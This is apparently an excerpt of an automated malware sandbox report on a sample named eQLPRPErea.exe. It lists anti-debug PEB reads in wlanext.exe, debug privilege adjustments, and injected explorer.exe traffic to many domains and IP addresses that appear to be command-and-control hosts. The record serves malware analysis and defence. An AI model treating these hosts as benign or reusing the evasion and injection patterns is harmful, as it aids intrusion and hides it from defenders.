Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314EA55 mov eax, dword ptr fs:[00000030h]	9_2_0314EA55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03114257 mov eax, dword ptr fs:[00000030h]	9_2_03114257
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03089240 mov eax, dword ptr fs:[00000030h]	9_2_03089240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03089240 mov eax, dword ptr fs:[00000030h]	9_2_03089240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03089240 mov eax, dword ptr fs:[00000030h]	9_2_03089240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03089240 mov eax, dword ptr fs:[00000030h]	9_2_03089240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0313B260 mov eax, dword ptr fs:[00000030h]	9_2_0313B260
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0313B260 mov eax, dword ptr fs:[00000030h]	9_2_0313B260
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C927A mov eax, dword ptr fs:[00000030h]	9_2_030C927A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03158A62 mov eax, dword ptr fs:[00000030h]	9_2_03158A62
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BD294 mov eax, dword ptr fs:[00000030h]	9_2_030BD294
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BD294 mov eax, dword ptr fs:[00000030h]	9_2_030BD294
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030852A5 mov eax, dword ptr fs:[00000030h]	9_2_030852A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030852A5 mov eax, dword ptr fs:[00000030h]	9_2_030852A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030852A5 mov eax, dword ptr fs:[00000030h]	9_2_030852A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030852A5 mov eax, dword ptr fs:[00000030h]	9_2_030852A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030852A5 mov eax, dword ptr fs:[00000030h]	9_2_030852A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0309AAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0309AAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BFAB0 mov eax, dword ptr fs:[00000030h]	9_2_030BFAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B2ACB mov eax, dword ptr fs:[00000030h]	9_2_030B2ACB
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B2AE4 mov eax, dword ptr fs:[00000030h]	9_2_030B2AE4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03089100 mov eax, dword ptr fs:[00000030h]	9_2_03089100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03089100 mov eax, dword ptr fs:[00000030h]	9_2_03089100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03089100 mov eax, dword ptr fs:[00000030h]	9_2_03089100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030A4120 mov eax, dword ptr fs:[00000030h]	9_2_030A4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030A4120 mov eax, dword ptr fs:[00000030h]	9_2_030A4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030A4120 mov eax, dword ptr fs:[00000030h]	9_2_030A4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030A4120 mov eax, dword ptr fs:[00000030h]	9_2_030A4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030A4120 mov ecx, dword ptr fs:[00000030h]	9_2_030A4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B513A mov eax, dword ptr fs:[00000030h]	9_2_030B513A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B513A mov eax, dword ptr fs:[00000030h]	9_2_030B513A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030AB944 mov eax, dword ptr fs:[00000030h]	9_2_030AB944
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030AB944 mov eax, dword ptr fs:[00000030h]	9_2_030AB944
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308C962 mov eax, dword ptr fs:[00000030h]	9_2_0308C962
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308B171 mov eax, dword ptr fs:[00000030h]	9_2_0308B171
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308B171 mov eax, dword ptr fs:[00000030h]	9_2_0308B171
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030AC182 mov eax, dword ptr fs:[00000030h]	9_2_030AC182
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BA185 mov eax, dword ptr fs:[00000030h]	9_2_030BA185
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B2990 mov eax, dword ptr fs:[00000030h]	9_2_030B2990
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B61A0 mov eax, dword ptr fs:[00000030h]	9_2_030B61A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B61A0 mov eax, dword ptr fs:[00000030h]	9_2_030B61A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031051BE mov eax, dword ptr fs:[00000030h]	9_2_031051BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031051BE mov eax, dword ptr fs:[00000030h]	9_2_031051BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031051BE mov eax, dword ptr fs:[00000030h]	9_2_031051BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031051BE mov eax, dword ptr fs:[00000030h]	9_2_031051BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031449A4 mov eax, dword ptr fs:[00000030h]	9_2_031449A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031449A4 mov eax, dword ptr fs:[00000030h]	9_2_031449A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031449A4 mov eax, dword ptr fs:[00000030h]	9_2_031449A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031449A4 mov eax, dword ptr fs:[00000030h]	9_2_031449A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031069A6 mov eax, dword ptr fs:[00000030h]	9_2_031069A6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0308B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0308B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0308B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031141E8 mov eax, dword ptr fs:[00000030h]	9_2_031141E8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03154015 mov eax, dword ptr fs:[00000030h]	9_2_03154015
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03154015 mov eax, dword ptr fs:[00000030h]	9_2_03154015
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03107016 mov eax, dword ptr fs:[00000030h]	9_2_03107016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03107016 mov eax, dword ptr fs:[00000030h]	9_2_03107016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03107016 mov eax, dword ptr fs:[00000030h]	9_2_03107016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309B02A mov eax, dword ptr fs:[00000030h]	9_2_0309B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309B02A mov eax, dword ptr fs:[00000030h]	9_2_0309B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309B02A mov eax, dword ptr fs:[00000030h]	9_2_0309B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309B02A mov eax, dword ptr fs:[00000030h]	9_2_0309B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B002D mov eax, dword ptr fs:[00000030h]	9_2_030B002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B002D mov eax, dword ptr fs:[00000030h]	9_2_030B002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B002D mov eax, dword ptr fs:[00000030h]	9_2_030B002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B002D mov eax, dword ptr fs:[00000030h]	9_2_030B002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B002D mov eax, dword ptr fs:[00000030h]	9_2_030B002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030A0050 mov eax, dword ptr fs:[00000030h]	9_2_030A0050
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030A0050 mov eax, dword ptr fs:[00000030h]	9_2_030A0050
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03151074 mov eax, dword ptr fs:[00000030h]	9_2_03151074
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03142073 mov eax, dword ptr fs:[00000030h]	9_2_03142073
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03089080 mov eax, dword ptr fs:[00000030h]	9_2_03089080
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03103884 mov eax, dword ptr fs:[00000030h]	9_2_03103884
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03103884 mov eax, dword ptr fs:[00000030h]	9_2_03103884
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C90AF mov eax, dword ptr fs:[00000030h]	9_2_030C90AF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]	9_2_030B20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]	9_2_030B20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]	9_2_030B20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]	9_2_030B20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]	9_2_030B20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]	9_2_030B20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BF0BF mov ecx, dword ptr fs:[00000030h]	9_2_030BF0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BF0BF mov eax, dword ptr fs:[00000030h]	9_2_030BF0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BF0BF mov eax, dword ptr fs:[00000030h]	9_2_030BF0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0311B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0311B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0311B8D0 mov ecx, dword ptr fs:[00000030h]	9_2_0311B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0311B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0311B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0311B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0311B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0311B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0311B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0311B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0311B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030858EC mov eax, dword ptr fs:[00000030h]	9_2_030858EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030840E1 mov eax, dword ptr fs:[00000030h]	9_2_030840E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030840E1 mov eax, dword ptr fs:[00000030h]	9_2_030840E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030840E1 mov eax, dword ptr fs:[00000030h]	9_2_030840E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0311FF10 mov eax, dword ptr fs:[00000030h]	9_2_0311FF10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0311FF10 mov eax, dword ptr fs:[00000030h]	9_2_0311FF10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BA70E mov eax, dword ptr fs:[00000030h]	9_2_030BA70E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BA70E mov eax, dword ptr fs:[00000030h]	9_2_030BA70E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0315070D mov eax, dword ptr fs:[00000030h]	9_2_0315070D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0315070D mov eax, dword ptr fs:[00000030h]	9_2_0315070D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030AF716 mov eax, dword ptr fs:[00000030h]	9_2_030AF716
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03084F2E mov eax, dword ptr fs:[00000030h]	9_2_03084F2E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03084F2E mov eax, dword ptr fs:[00000030h]	9_2_03084F2E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BE730 mov eax, dword ptr fs:[00000030h]	9_2_030BE730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309EF40 mov eax, dword ptr fs:[00000030h]	9_2_0309EF40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309FF60 mov eax, dword ptr fs:[00000030h]	9_2_0309FF60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03158F6A mov eax, dword ptr fs:[00000030h]	9_2_03158F6A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03107794 mov eax, dword ptr fs:[00000030h]	9_2_03107794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03107794 mov eax, dword ptr fs:[00000030h]	9_2_03107794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03107794 mov eax, dword ptr fs:[00000030h]	9_2_03107794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03098794 mov eax, dword ptr fs:[00000030h]	9_2_03098794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C37F5 mov eax, dword ptr fs:[00000030h]	9_2_030C37F5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308C600 mov eax, dword ptr fs:[00000030h]	9_2_0308C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308C600 mov eax, dword ptr fs:[00000030h]	9_2_0308C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308C600 mov eax, dword ptr fs:[00000030h]	9_2_0308C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B8E00 mov eax, dword ptr fs:[00000030h]	9_2_030B8E00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BA61C mov eax, dword ptr fs:[00000030h]	9_2_030BA61C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BA61C mov eax, dword ptr fs:[00000030h]	9_2_030BA61C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03141608 mov eax, dword ptr fs:[00000030h]	9_2_03141608
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308E620 mov eax, dword ptr fs:[00000030h]	9_2_0308E620
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0313FE3F mov eax, dword ptr fs:[00000030h]	9_2_0313FE3F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]	9_2_03097E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]	9_2_03097E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]	9_2_03097E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]	9_2_03097E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]	9_2_03097E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]	9_2_03097E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314AE44 mov eax, dword ptr fs:[00000030h]	9_2_0314AE44
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314AE44 mov eax, dword ptr fs:[00000030h]	9_2_0314AE44
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309766D mov eax, dword ptr fs:[00000030h]	9_2_0309766D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]	9_2_030AAE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]	9_2_030AAE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]	9_2_030AAE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]	9_2_030AAE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]	9_2_030AAE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0311FE87 mov eax, dword ptr fs:[00000030h]	9_2_0311FE87
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03150EA5 mov eax, dword ptr fs:[00000030h]	9_2_03150EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03150EA5 mov eax, dword ptr fs:[00000030h]	9_2_03150EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03150EA5 mov eax, dword ptr fs:[00000030h]	9_2_03150EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031046A7 mov eax, dword ptr fs:[00000030h]	9_2_031046A7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03158ED6 mov eax, dword ptr fs:[00000030h]	9_2_03158ED6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B36CC mov eax, dword ptr fs:[00000030h]	9_2_030B36CC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C8EC7 mov eax, dword ptr fs:[00000030h]	9_2_030C8EC7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0313FEC0 mov eax, dword ptr fs:[00000030h]	9_2_0313FEC0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B16E0 mov ecx, dword ptr fs:[00000030h]	9_2_030B16E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030976E2 mov eax, dword ptr fs:[00000030h]	9_2_030976E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03158D34 mov eax, dword ptr fs:[00000030h]	9_2_03158D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0310A537 mov eax, dword ptr fs:[00000030h]	9_2_0310A537
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314E539 mov eax, dword ptr fs:[00000030h]	9_2_0314E539
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B4D3B mov eax, dword ptr fs:[00000030h]	9_2_030B4D3B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B4D3B mov eax, dword ptr fs:[00000030h]	9_2_030B4D3B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B4D3B mov eax, dword ptr fs:[00000030h]	9_2_030B4D3B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308AD30 mov eax, dword ptr fs:[00000030h]	9_2_0308AD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]	9_2_03093D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C3D43 mov eax, dword ptr fs:[00000030h]	9_2_030C3D43
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03103540 mov eax, dword ptr fs:[00000030h]	9_2_03103540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03133D40 mov eax, dword ptr fs:[00000030h]	9_2_03133D40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030A7D50 mov eax, dword ptr fs:[00000030h]	9_2_030A7D50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030AC577 mov eax, dword ptr fs:[00000030h]	9_2_030AC577
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030AC577 mov eax, dword ptr fs:[00000030h]	9_2_030AC577
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]	9_2_03082D8A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]	9_2_03082D8A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]	9_2_03082D8A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]	9_2_03082D8A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]	9_2_03082D8A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]	9_2_030B2581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]	9_2_030B2581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]	9_2_030B2581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]	9_2_030B2581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BFD9B mov eax, dword ptr fs:[00000030h]	9_2_030BFD9B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BFD9B mov eax, dword ptr fs:[00000030h]	9_2_030BFD9B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B35A1 mov eax, dword ptr fs:[00000030h]	9_2_030B35A1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031505AC mov eax, dword ptr fs:[00000030h]	9_2_031505AC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031505AC mov eax, dword ptr fs:[00000030h]	9_2_031505AC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B1DB5 mov eax, dword ptr fs:[00000030h]	9_2_030B1DB5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B1DB5 mov eax, dword ptr fs:[00000030h]	9_2_030B1DB5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B1DB5 mov eax, dword ptr fs:[00000030h]	9_2_030B1DB5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]	9_2_03106DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]	9_2_03106DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]	9_2_03106DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03106DC9 mov ecx, dword ptr fs:[00000030h]	9_2_03106DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]	9_2_03106DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]	9_2_03106DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03138DF1 mov eax, dword ptr fs:[00000030h]	9_2_03138DF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0309D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0309D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]	9_2_0314FDE2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]	9_2_0314FDE2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]	9_2_0314FDE2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]	9_2_0314FDE2

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.bedpee.com
Source: C:\Windows\explorer.exe	Domain query: www.pmrack.com
Source: C:\Windows\explorer.exe	Network Connect: 64.32.22.102 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.420vaca.com
Source: C:\Windows\explorer.exe	Network Connect: 184.168.131.241 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.qcmax.com
Source: C:\Windows\explorer.exe	Domain query: www.appgusher.com
Source: C:\Windows\explorer.exe	Domain query: www.thesixteenthround.net
Source: C:\Windows\explorer.exe	Domain query: www.nagoyadoori.xyz
Source: C:\Windows\explorer.exe	Domain query: www.playfulpainters.com
Source: C:\Windows\explorer.exe	Network Connect: 64.190.62.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.serversexposed.com
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 135.181.58.27 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.biehnrecords.com
Source: C:\Windows\explorer.exe	Domain query: www.heliumhubs.com
Source: C:\Windows\explorer.exe	Domain query: www.shujahumayun.com
Source: C:\Windows\explorer.exe	Domain query: www.stone-master.info
Source: C:\Windows\explorer.exe	Network Connect: 62.116.130.8 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.128.125.95 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.230.60.177 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.autobrehna.com
